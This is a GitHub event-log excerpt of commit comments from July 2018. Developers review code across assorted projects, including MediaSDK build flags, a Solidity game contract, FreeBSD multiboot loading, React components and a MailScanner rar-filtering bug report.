{"id":"7995375169","type":"CommitCommentEvent","actor":{"login":"IlyaSergeyev"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29780316,"position":4,"line":22,"path":"_studio/mfx_lib/genx/copy_kernels/src/genx_cht_copy_isa.cpp","commit_id":"ef966fb11120920fa93b3e049b8fda92967ca0eb","created_at":"2018-07-20T14:33:34Z","updated_at":"2018-07-20T14:33:34Z","author_association":"OWNER","body":"It will appear in next commits. Is it needed to switch MCTF and LA with separate flags in cmake or it will be more suitable to have only one common flag?\r\n\r\nFrom: Dmitry Rogozhkin [mailto:notifications@github.com]\r\nSent: Friday, July 20, 2018 5:27 PM\r\nTo: IlyaSergeyev/MediaSDK <MediaSDK@noreply.github.com>\r\nCc: Sergeev, IlyaX <ilyax.sergeev@intel.com>; Author <author@noreply.github.com>\r\nSubject: Re: [IlyaSergeyev/MediaSDK] Possibility to turn off loading programs into memory for reducing size of the library (ef966fb)\r\n\r\n\r\nWhy you switch off copy kernels only? How about MCTF and LA? Do you really need them?\r\n\r\nSecondly, we have other feature request which intersects with this one. Which is: disable CM kernels from the build with cmake configure level option. I believe we need to do that within this change.\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/IlyaSergeyev/MediaSDK/commit/ef966fb11120920fa93b3e049b8fda92967ca0eb#commitcomment-29780215>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AmzXKUs8pB4DgFwATz3myTrtfJjQYJZvks5uIeifgaJpZM4VYH6E>.\r\n\n--------------------------------------------------------------------\nJoint Stock Company Intel A/O\nRegistered legal address: Krylatsky Hills Business Park,\n17 Krylatskaya Str., Bldg 4, Moscow 121614,\nRussian Federation\n\nThis e-mail and any attachments may contain confidential material for\nthe sole use of the intended recipient(s). Any review or distribution\nby others is strictly prohibited. If you are not the intended\nrecipient, please contact the sender and delete all copies.\n"}},"created_at":"2018-07-20T14:33:34Z"}
{"id":"7995375721","type":"CommitCommentEvent","actor":{"login":"va3emt"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29780320,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-20T14:33:40Z","updated_at":"2018-07-20T14:33:40Z","author_association":"NONE","body":"Maybe this isn't the correct forum to ask this but I'm not sure where I would go to ask. If I wanted to set the sensitivity of the receiver high, how would I do that?"}},"created_at":"2018-07-20T14:33:40Z"}
{"id":"7995377242","type":"CommitCommentEvent","actor":{"login":"srkigit1982"},"repo":{"name":"srkigit1982/openProject"},"payload":{"comment":{"id":29780323,"position":null,"line":null,"path":null,"commit_id":"e644d1d81163c9ab63f96a5829484ff3978d1b44","created_at":"2018-07-20T14:33:57Z","updated_at":"2018-07-20T14:33:57Z","author_association":"OWNER","body":"Bravo"}},"created_at":"2018-07-20T14:33:57Z"}
{"id":"7995378245","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780324,"position":163,"line":225,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T14:34:07Z","updated_at":"2018-07-20T14:34:07Z","author_association":"NONE","body":"This is an internal function so mistakes are supposed to be fewer. Still, if a wrong `id` is passed, the only test in this function, `games[id].plaintextMoveInvitee != Move.None`, will pass."}},"created_at":"2018-07-20T14:34:07Z"}
{"id":"7995381893","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780329,"position":163,"line":225,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T14:34:45Z","updated_at":"2018-07-20T14:34:45Z","author_association":"NONE","body":"Because of your choice of `None` as `3` instead of `0`."}},"created_at":"2018-07-20T14:34:45Z"}
{"id":"7995382144","type":"CommitCommentEvent","actor":{"login":"chengziCode"},"repo":{"name":"chengziCode/Repository_Test"},"payload":{"comment":{"id":29780330,"position":null,"line":null,"path":null,"commit_id":"84d9dea79c826de15838b7ee70eaf4c58bb73bdc","created_at":"2018-07-20T14:34:47Z","updated_at":"2018-07-20T14:34:47Z","author_association":"OWNER","body":"21"}},"created_at":"2018-07-20T14:34:47Z"}
{"id":"7995383920","type":"CommitCommentEvent","actor":{"login":"kuba97531"},"repo":{"name":"featurecat/lizzie"},"payload":{"comment":{"id":29780336,"position":44,"line":452,"path":"src/main/java/featurecat/lizzie/analysis/Leelaz.java","commit_id":"20611dbfdd3349204bfc14792544b62f95d97b26","created_at":"2018-07-20T14:35:06Z","updated_at":"2018-07-20T14:35:06Z","author_association":"NONE","body":"I will add the dynamic komi show/hide under D key.\r\nI will change the `drawControls` method to only show this entry however only if I recognize that the leelaz is actually producing this value. Otherwise it will just confuse users.\r\nIs that good?"}},"created_at":"2018-07-20T14:35:06Z"}
{"id":"7995384513","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Arcadiusz/Arkadiusz-Urbanski-Kodilla-java"},"payload":{"comment":{"id":29780338,"position":15,"line":15,"path":"kodilla-hibernate/src/main/java/com/kodilla/hibernate/invoice/Item.java","commit_id":"291cfc9f10ea0320933ad595b8475a904829993b","created_at":"2018-07-20T14:35:11Z","updated_at":"2018-07-20T14:35:11Z","author_association":"NONE","body":"Brakuje modyfikatora dostępu"}},"created_at":"2018-07-20T14:35:11Z"}
{"id":"7995385119","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29780340,"position":51,"line":31,"path":"src/components/Dashboard.js","commit_id":"2ef29a9732e3193b9a608fe6ec5ad6454b486a26","created_at":"2018-07-20T14:35:17Z","updated_at":"2018-07-20T14:35:17Z","author_association":"COLLABORATOR","body":"We use the activePage prop to determine which content to render.  These `<Typography>` sections will be replaced with components like `Users`, `Images`."}},"created_at":"2018-07-20T14:35:17Z"}
{"id":"7995386154","type":"CommitCommentEvent","actor":{"login":"dvrogozh"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29780342,"position":197,"line":58,"path":"_studio/shared/include/mfx_config.h","commit_id":"21daaf590fc2071c190e0d7a8533be24498c704d","created_at":"2018-07-20T14:35:28Z","updated_at":"2018-07-20T14:35:28Z","author_association":"NONE","body":"remove this comment. this belongs to commit message"}},"created_at":"2018-07-20T14:35:28Z"}
{"id":"7995389148","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29780346,"position":76,"line":56,"path":"src/components/Dashboard.js","commit_id":"2ef29a9732e3193b9a608fe6ec5ad6454b486a26","created_at":"2018-07-20T14:36:01Z","updated_at":"2018-07-20T14:36:01Z","author_association":"COLLABORATOR","body":"When we click the tab we dispatch the `activePageChanged` action."}},"created_at":"2018-07-20T14:36:01Z"}
{"id":"7995391472","type":"CommitCommentEvent","actor":{"login":"lstauber"},"repo":{"name":"tom-englert/DataGridExtensions"},"payload":{"comment":{"id":29780356,"position":null,"line":null,"path":null,"commit_id":"c7d4177c1642cf355e7ec6929cb88ae4f8a375fc","created_at":"2018-07-20T14:36:24Z","updated_at":"2018-07-20T14:36:24Z","author_association":"NONE","body":"Thank you very match for your sample! Included in my datagrid style."}},"created_at":"2018-07-20T14:36:24Z"}
{"id":"7995391646","type":"CommitCommentEvent","actor":{"login":"httpdigest"},"repo":{"name":"Itay2805/Attack"},"payload":{"comment":{"id":29780357,"position":5,"line":109,"path":"app/src/main/java/fuck/it/attack/graphics/Shader.java","commit_id":"d25b5d1e774b85235719efb1c76bbad2d2e3b98d","created_at":"2018-07-20T14:36:26Z","updated_at":"2018-07-20T14:36:26Z","author_association":"NONE","body":"You are already using Gradle, so I also do not understand why you copied the JOML sources instead of referencing it from Maven Central in your build.gradle file. A version which is compatible with Android is org.joml:joml-jdk8:1.9.10."}},"created_at":"2018-07-20T14:36:26Z"}
{"id":"7995392617","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780359,"position":6,"line":172,"path":"stand/efi/loader/multiboot2.c","commit_id":"31befc889afad20703ba1a5388c89495e9d39497","created_at":"2018-07-20T14:36:37Z","updated_at":"2018-07-20T14:36:37Z","author_association":"NONE","body":"No need for this extra newline"}},"created_at":"2018-07-20T14:36:37Z"}
{"id":"7995393776","type":"CommitCommentEvent","actor":{"login":"ZheniaTrochun"},"repo":{"name":"dimaLytvyniuk/ScalaLearning"},"payload":{"comment":{"id":29780362,"position":15,"line":112,"path":"Hortsman/src/Part4/Part4.scala","commit_id":"4fdc9827949f3c79d0fca565355724bf8255d814","created_at":"2018-07-20T14:36:48Z","updated_at":"2018-07-20T14:36:48Z","author_association":"NONE","body":"You can use max method from RichInt instead of if ... else ...\r\nfor example:\r\n`val max = (properties foldLeft[Int] 0) (_ max _._1.length)`\r\nOr you can go easier way: \r\n`val max = (properties maxBy (_._1.length))._1.length`"}},"created_at":"2018-07-20T14:36:48Z"}
{"id":"7995394247","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29780364,"position":null,"line":null,"path":null,"commit_id":"491822fce231b1828c293b3eead83e98087ec40d","created_at":"2018-07-20T14:36:53Z","updated_at":"2018-07-20T14:36:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fitness Parameters -- Chart View](https://trello.com/c/eMK3TnBg/65-fitness-parameters-chart-view)"}},"created_at":"2018-07-20T14:36:53Z"}
{"id":"7995394511","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29780366,"position":111,"line":85,"path":"src/components/Dashboard.js","commit_id":"2ef29a9732e3193b9a608fe6ec5ad6454b486a26","created_at":"2018-07-20T14:36:56Z","updated_at":"2018-07-20T14:36:56Z","author_association":"COLLABORATOR","body":"Here is an example of Props validation for `withStyles` props we are passing for Material UI."}},"created_at":"2018-07-20T14:36:56Z"}
{"id":"7995394663","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29780367,"position":null,"line":null,"path":null,"commit_id":"24de6e13cab9287654e0688d38ef2cff31bd83d1","created_at":"2018-07-20T14:36:58Z","updated_at":"2018-07-20T14:36:58Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fitness Parameters -- Chart View](https://trello.com/c/eMK3TnBg/65-fitness-parameters-chart-view)"}},"created_at":"2018-07-20T14:36:58Z"}
{"id":"7995396698","type":"CommitCommentEvent","actor":{"login":"pavel64-sutyrin"},"repo":{"name":"pavel64-sutyrin/startc"},"payload":{"comment":{"id":29780370,"position":3,"line":3,"path":"hello.c","commit_id":"88f669c6e9257f1b5ced66a59a675aa6c6577e5e","created_at":"2018-07-20T14:37:20Z","updated_at":"2018-07-20T14:37:20Z","author_association":"OWNER","body":"полезный коммент ;) "}},"created_at":"2018-07-20T14:37:20Z"}
{"id":"7995397240","type":"CommitCommentEvent","actor":{"login":"kristapuciitis"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780371,"position":1,"line":1,"path":"stand/efi/loader/multiboot2.h","commit_id":"6802c7fd1f0a9094ac887eba83023779a6c3c12a","created_at":"2018-07-20T14:37:25Z","updated_at":"2018-07-20T14:37:25Z","author_association":"OWNER","body":"I don't need all structs from that file, and I changed all prefixes from multiboot_ to multiboot2_. Should I really add the copyright notice if the structs and defines are not entirely copied?"}},"created_at":"2018-07-20T14:37:25Z"}
{"id":"7995401297","type":"CommitCommentEvent","actor":{"login":"edwardrhoades"},"repo":{"name":"evvTech/Azure-Radney"},"payload":{"comment":{"id":29780380,"position":null,"line":null,"path":null,"commit_id":"11566f82d43ce0accd437e57e899460210081072","created_at":"2018-07-20T14:38:09Z","updated_at":"2018-07-20T14:38:09Z","author_association":"NONE","body":"This is the slide deck from the awesome Tim Radney from SQL Skills! "}},"created_at":"2018-07-20T14:38:09Z"}
{"id":"7995401428","type":"CommitCommentEvent","actor":{"login":"yyx990803"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29780381,"position":6,"line":53,"path":"packages/@vue/cli/bin/vue.js","commit_id":"7e6c37c09bfd9e6a7733a60799f7cadd9bf5c5f7","created_at":"2018-07-20T14:38:10Z","updated_at":"2018-07-20T14:38:10Z","author_association":"MEMBER","body":"Commander handles it as `git: false`"}},"created_at":"2018-07-20T14:38:10Z"}
{"id":"7995407471","type":"CommitCommentEvent","actor":{"login":"YannGmt"},"repo":{"name":"YannGmt/mpsrad"},"payload":{"comment":{"id":29780394,"position":null,"line":null,"path":null,"commit_id":"6782e72f3a6119a7b01eef33276e3c60dc938c1e","created_at":"2018-07-20T14:39:15Z","updated_at":"2018-07-20T14:39:15Z","author_association":"OWNER","body":"I've just changed the icondir and add the use of the dummy_chopper.\r\nI tested the start function and it displayed the IRAM GUI interface as expected."}},"created_at":"2018-07-20T14:39:15Z"}
{"id":"7995407706","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29780395,"position":39,"line":49,"path":"src/components/Landing.js","commit_id":"2ef29a9732e3193b9a608fe6ec5ad6454b486a26","created_at":"2018-07-20T14:39:17Z","updated_at":"2018-07-20T14:39:17Z","author_association":"COLLABORATOR","body":"This notation is a bit confusing.  I am using object destructuring to extract the property keys from props as variables.  But because `activePageChanged` already exists in the scope I have to assign it to a new variable name called `dispatchActivePageChanged`."}},"created_at":"2018-07-20T14:39:17Z"}
{"id":"7995409559","type":"CommitCommentEvent","actor":{"login":"nordicdyno"},"repo":{"name":"insolar/insolar"},"payload":{"comment":{"id":29780397,"position":54,"line":54,"path":"genesis/model/object/object.go","commit_id":"66c8f09ce690d08e9d6fa12145c808aa9e0d3492","created_at":"2018-07-20T14:39:38Z","updated_at":"2018-07-20T14:39:38Z","author_association":"NONE","body":"`compositeFactory CompositeFactory` – it's too verbose to my taste. "}},"created_at":"2018-07-20T14:39:38Z"}
{"id":"7995413063","type":"CommitCommentEvent","actor":{"login":"Funmi75"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29780404,"position":null,"line":null,"path":null,"commit_id":"28648e369aa96aa471379bdf2241deeb90b7ad55","created_at":"2018-07-20T14:40:15Z","updated_at":"2018-07-20T14:40:15Z","author_association":"NONE","body":"\r\nWeek 1 exercises\r\n[week_1_soc-homework_Odunowo_Olufunmilayo.zip](https://github.com/1millionwomentotech/toolkitten/files/2214332/week_1_soc-homework_Odunowo_Olufunmilayo.zip)\r\n"}},"created_at":"2018-07-20T14:40:15Z"}
{"id":"7995413860","type":"CommitCommentEvent","actor":{"login":"dvrogozh"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29780406,"position":2,"line":1,"path":"builder/ConfCodecs.cmake","commit_id":"21daaf590fc2071c190e0d7a8533be24498c704d","created_at":"2018-07-20T14:40:23Z","updated_at":"2018-07-20T14:40:23Z","author_association":"NONE","body":"Here is what you entirely miss: description of how it works:)! Put comprehensive description into commit message."}},"created_at":"2018-07-20T14:40:23Z"}
{"id":"7995414357","type":"CommitCommentEvent","actor":{"login":"Poliarus"},"repo":{"name":"vpetrigo/python-course"},"payload":{"comment":{"id":29780411,"position":25,"line":25,"path":"week3/task1.py","commit_id":"f27f86e1999937555d85f7da4707121487005a1b","created_at":"2018-07-20T14:40:28Z","updated_at":"2018-07-20T14:40:28Z","author_association":"NONE","body":"reader = list(input() for _ in range(3))\r\norigin, s_from, s_to = list(reader)"}},"created_at":"2018-07-20T14:40:28Z"}
{"id":"7995414417","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780412,"position":null,"line":null,"path":null,"commit_id":"b7e924b962638f27382a00b0f21108f1cd8c6e6b","created_at":"2018-07-20T14:40:28Z","updated_at":"2018-07-20T14:40:28Z","author_association":"NONE","body":"The subject of this patch should be: 'Load FreeBSD kernel as a multiboot module' or some such. You are not actually loading a module here."}},"created_at":"2018-07-20T14:40:28Z"}
{"id":"7995415654","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29780413,"position":50,"line":59,"path":"src/components/Landing.js","commit_id":"2ef29a9732e3193b9a608fe6ec5ad6454b486a26","created_at":"2018-07-20T14:40:41Z","updated_at":"2018-07-20T14:40:41Z","author_association":"COLLABORATOR","body":"Many examples you find on line will show passing all parent props down to children using the rest operator.  I think the best practice is to always explicitly pass only the necessary props down to the child component as we are doing here."}},"created_at":"2018-07-20T14:40:41Z"}
{"id":"7995422434","type":"CommitCommentEvent","actor":{"login":"aswinrprasad"},"repo":{"name":"aswinrprasad/C-Programs"},"payload":{"comment":{"id":29780436,"position":null,"line":null,"path":null,"commit_id":"5c1ac495c0bb3af2de79638baaa275e5738ec5c8","created_at":"2018-07-20T14:41:53Z","updated_at":"2018-07-20T14:41:53Z","author_association":"OWNER","body":"Information"}},"created_at":"2018-07-20T14:41:53Z"}
{"id":"7995432797","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29780495,"position":null,"line":null,"path":null,"commit_id":"b9ddd68a9c073cc4b72de8acbd8335343dce26b5","created_at":"2018-07-20T14:43:37Z","updated_at":"2018-07-20T14:43:37Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/114"}},"created_at":"2018-07-20T14:43:37Z"}
{"id":"7995433131","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29780496,"position":1,"line":1,"path":"src/store/activePageMiddleware.js","commit_id":"2ef29a9732e3193b9a608fe6ec5ad6454b486a26","created_at":"2018-07-20T14:43:41Z","updated_at":"2018-07-20T14:43:41Z","author_association":"COLLABORATOR","body":"Many examples will show the code for fetching data from an API in a component's `componentWillMount` handler.  When possible I prefer putting data fetching code in middleware.  This way our components are much simpler and only need to know how to display data."}},"created_at":"2018-07-20T14:43:41Z"}
{"id":"7995434002","type":"CommitCommentEvent","actor":{"login":"ZheniaTrochun"},"repo":{"name":"dimaLytvyniuk/ScalaLearning"},"payload":{"comment":{"id":29780498,"position":42,"line":139,"path":"Hortsman/src/Part4/Part4.scala","commit_id":"4fdc9827949f3c79d0fca565355724bf8255d814","created_at":"2018-07-20T14:43:50Z","updated_at":"2018-07-20T14:43:50Z","author_association":"NONE","body":"`Tuple3[Int, Int, Int]` can be replaced with `(Int, Int, Int)`"}},"created_at":"2018-07-20T14:43:50Z"}
{"id":"7995434510","type":"CommitCommentEvent","actor":{"login":"pavel64-sutyrin"},"repo":{"name":"pavel64-sutyrin/startc"},"payload":{"comment":{"id":29780501,"position":null,"line":null,"path":null,"commit_id":"40e16799160dccb8db3d2ad665c11007d00cb49f","created_at":"2018-07-20T14:43:56Z","updated_at":"2018-07-20T14:43:56Z","author_association":"OWNER","body":"- [ ] исправить насовсем."}},"created_at":"2018-07-20T14:43:56Z"}
{"id":"7995436236","type":"CommitCommentEvent","actor":{"login":"juribeparada"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29780506,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-20T14:44:15Z","updated_at":"2018-07-20T14:44:15Z","author_association":"OWNER","body":"va3emt: during compilation, you need to enable \"#define AD7021_GAIN_HIGH\" instead of \"#define AD7021_GAIN_AUTO\" in Config.h. Be aware this strongly depends on board design and external noise. I get best results with original ZUMspot boards."}},"created_at":"2018-07-20T14:44:15Z"}
{"id":"7995436359","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780507,"position":1,"line":1,"path":"stand/efi/loader/multiboot2.h","commit_id":"6802c7fd1f0a9094ac887eba83023779a6c3c12a","created_at":"2018-07-20T14:44:16Z","updated_at":"2018-07-20T14:44:16Z","author_association":"NONE","body":"Yes, you must keep copyright notices.\r\n\r\nAnd even if you don't use everything in that file please import it as-is. If the spec is updated in the future then we will just have to import the updated header. If you modify it then future updates are going to be much more complicated. The header for multiboot1 was imported verbatim for this exact reason."}},"created_at":"2018-07-20T14:44:16Z"}
{"id":"7995437018","type":"CommitCommentEvent","actor":{"login":"BertrandBordage"},"repo":{"name":"wagtail/wagtail"},"payload":{"comment":{"id":29780508,"position":null,"line":null,"path":null,"commit_id":"aa5f2497ea3d5e375defc5deb5264d6dfc129dd9","created_at":"2018-07-20T14:44:23Z","updated_at":"2018-07-20T14:44:23Z","author_association":"MEMBER","body":"**Yes** :)"}},"created_at":"2018-07-20T14:44:23Z"}
{"id":"7995437384","type":"CommitCommentEvent","actor":{"login":"dvrogozh"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29780510,"position":4,"line":3,"path":"builder/ConfCodecs.cmake","commit_id":"21daaf590fc2071c190e0d7a8533be24498c704d","created_at":"2018-07-20T14:44:27Z","updated_at":"2018-07-20T14:44:27Z","author_association":"NONE","body":"Android don't use cmake and never will. Which means that the file you wrote for Android is useless. Drop it."}},"created_at":"2018-07-20T14:44:27Z"}
{"id":"7995440503","type":"CommitCommentEvent","actor":{"login":"JK-kaicm"},"repo":{"name":"JK-kaicm/Papers-Please"},"payload":{"comment":{"id":29780517,"position":null,"line":null,"path":null,"commit_id":"edcdd1ae6c81e9358e2835d8060091a8b57be8bc","created_at":"2018-07-20T14:44:59Z","updated_at":"2018-07-20T14:44:59Z","author_association":"OWNER","body":"Glory to DSM"}},"created_at":"2018-07-20T14:44:59Z"}
{"id":"7995441845","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780522,"position":null,"line":null,"path":null,"commit_id":"d331074530bf61f28c68d963db96c336b7dbaa74","created_at":"2018-07-20T14:45:14Z","updated_at":"2018-07-20T14:45:14Z","author_association":"NONE","body":"Please explain in the commit message why you need such a parameter. Without a description of the purpose of this change I'm not able to review it."}},"created_at":"2018-07-20T14:45:14Z"}
{"id":"7995442146","type":"CommitCommentEvent","actor":{"login":"alextrastero"},"repo":{"name":"react-materialize/react-materialize"},"payload":{"comment":{"id":29780524,"position":null,"line":null,"path":null,"commit_id":"ad253cc8bce9eb7b80e731a9644c0a85138e9d2a","created_at":"2018-07-20T14:45:17Z","updated_at":"2018-07-20T14:45:17Z","author_association":"MEMBER","body":"Nice!"}},"created_at":"2018-07-20T14:45:17Z"}
{"id":"7995446543","type":"CommitCommentEvent","actor":{"login":"dvrogozh"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29780540,"position":30,"line":30,"path":"builder/profiles/android.cmake","commit_id":"21daaf590fc2071c190e0d7a8533be24498c704d","created_at":"2018-07-20T14:45:59Z","updated_at":"2018-07-20T14:45:59Z","author_association":"NONE","body":"I would like to see a separate change which entirely removes these UMC defines and switches them to MFX defines. With that we will simply drop the next lines entirely."}},"created_at":"2018-07-20T14:45:59Z"}
{"id":"7995446796","type":"CommitCommentEvent","actor":{"login":"SamitOC"},"repo":{"name":"MailScanner/v5"},"payload":{"comment":{"id":29780542,"position":null,"line":null,"path":null,"commit_id":"96e02d65c7bb50b09e533bf5e2a964cead2939ae","created_at":"2018-07-20T14:46:02Z","updated_at":"2018-07-20T14:46:02Z","author_association":"NONE","body":"Hello. \r\nI'm having issues with this patch. The unrar command receives \"file\\ with\\ spaces.rar\" instead of \"file with spaces.rar\", and it's giving some errors (for example, a rar with an .exe inside is passing through the rule \"deny \\.exe$\" without being blocked). So I need to remove that line to make it work as expected.\r\n\r\nCould someone confirm if it's working or not?\r\n\r\nMy test platform:\r\nEFA-3.0.2.6\r\nMailScanner-5.0.7-1.noarch\r\nunrar-5.2.7-1.el6.x86_64\r\n\r\nThanks."}},"created_at":"2018-07-20T14:46:02Z"}
{"id":"7995449549","type":"CommitCommentEvent","actor":{"login":"k-stachowiak"},"repo":{"name":"mpg/mbedtls"},"payload":{"comment":{"id":29780547,"position":68,"line":2673,"path":"library/ssl_tls.c","commit_id":"41c2d3eca0868f2e5da5aaf09c1ed649dce0d02b","created_at":"2018-07-20T14:46:32Z","updated_at":"2018-07-20T14:46:32Z","author_association":"NONE","body":"Found a typo here: \"handshame\""}},"created_at":"2018-07-20T14:46:32Z"}
{"id":"7995453636","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"nwoolls/MultiMiner"},"payload":{"comment":{"id":29780553,"position":null,"line":null,"path":null,"commit_id":"ff6bc385f4682796a5758e17bb7f01ff0aceb8e7","created_at":"2018-07-20T14:47:14Z","updated_at":"2018-07-20T14:47:14Z","author_association":"NONE","body":"ff6bc38"}},"created_at":"2018-07-20T14:47:14Z"}
{"id":"7995459573","type":"CommitCommentEvent","actor":{"login":"juribeparada"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29780568,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-20T14:48:16Z","updated_at":"2018-07-20T14:48:16Z","author_association":"OWNER","body":"narspt: it's really nice to see that you get an improvement!"}},"created_at":"2018-07-20T14:48:16Z"}
{"id":"7995462180","type":"CommitCommentEvent","actor":{"login":"mywtfmp3"},"repo":{"name":"mywtfmp3/boost_graph_cookbook_2"},"payload":{"comment":{"id":29780574,"position":null,"line":null,"path":null,"commit_id":"f003aa9368ea559d4f67a5d4785533754fb4cb8c","created_at":"2018-07-20T14:48:42Z","updated_at":"2018-07-20T14:48:42Z","author_association":"OWNER","body":"I am taking a course on graph algorithm at the moment(on coursera). Some of the assignments are quite challenging but give me lots of intuitions. "}},"created_at":"2018-07-20T14:48:42Z"}
{"id":"7995466848","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780589,"position":304,"line":261,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-20T14:49:31Z","updated_at":"2018-07-20T14:49:31Z","author_association":"NONE","body":"You are doing `SLOAD`ing `games[id].inviter` twice. Can you save some gas?"}},"created_at":"2018-07-20T14:49:31Z"}
{"id":"7995467378","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780590,"position":307,"line":264,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-20T14:49:36Z","updated_at":"2018-07-20T14:49:36Z","author_association":"NONE","body":"You are doing `SLOAD`ing `games[id].invitee` twice. Can you save some gas?"}},"created_at":"2018-07-20T14:49:36Z"}
{"id":"7995468751","type":"CommitCommentEvent","actor":{"login":"FNickRU"},"repo":{"name":"FNickRU/ELTEXCourse"},"payload":{"comment":{"id":29780596,"position":null,"line":null,"path":null,"commit_id":"4dc01f71372283e5ee3d312c1a73cf713b54e8a0","created_at":"2018-07-20T14:49:50Z","updated_at":"2018-07-20T14:49:50Z","author_association":"OWNER","body":"Билд не проходит, но так и надо"}},"created_at":"2018-07-20T14:49:50Z"}
{"id":"7995468833","type":"CommitCommentEvent","actor":{"login":"kristapuciitis"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780598,"position":null,"line":null,"path":null,"commit_id":"d331074530bf61f28c68d963db96c336b7dbaa74","created_at":"2018-07-20T14:49:51Z","updated_at":"2018-07-20T14:49:51Z","author_association":"OWNER","body":"I will later want to specify address into which metadata should be loaded."}},"created_at":"2018-07-20T14:49:51Z"}
{"id":"7995469139","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780600,"position":409,"line":321,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-20T14:49:55Z","updated_at":"2018-07-20T14:49:55Z","author_association":"NONE","body":"You are doing `SLOAD`ing `games[id].inviter` twice. Can you save some gas?"}},"created_at":"2018-07-20T14:49:55Z"}
{"id":"7995469760","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780603,"position":415,"line":325,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-20T14:50:01Z","updated_at":"2018-07-20T14:50:01Z","author_association":"NONE","body":"You are doing `SLOAD`ing `games[id].invitee` twice. Can you save some gas?"}},"created_at":"2018-07-20T14:50:01Z"}
{"id":"7995470406","type":"CommitCommentEvent","actor":{"login":"fmvilas"},"repo":{"name":"asyncapi/asyncapi"},"payload":{"comment":{"id":29780604,"position":4,"line":4,"path":"schema/asyncapi.json","commit_id":"57dfc9566a110ddfae218d2732fc413189147066","created_at":"2018-07-20T14:50:08Z","updated_at":"2018-07-20T14:50:08Z","author_association":"MEMBER","body":"Upgrading JSON schema would be a breaking change and it's already being considered for version 2.0.0: https://github.com/asyncapi/asyncapi/issues/76"}},"created_at":"2018-07-20T14:50:08Z"}
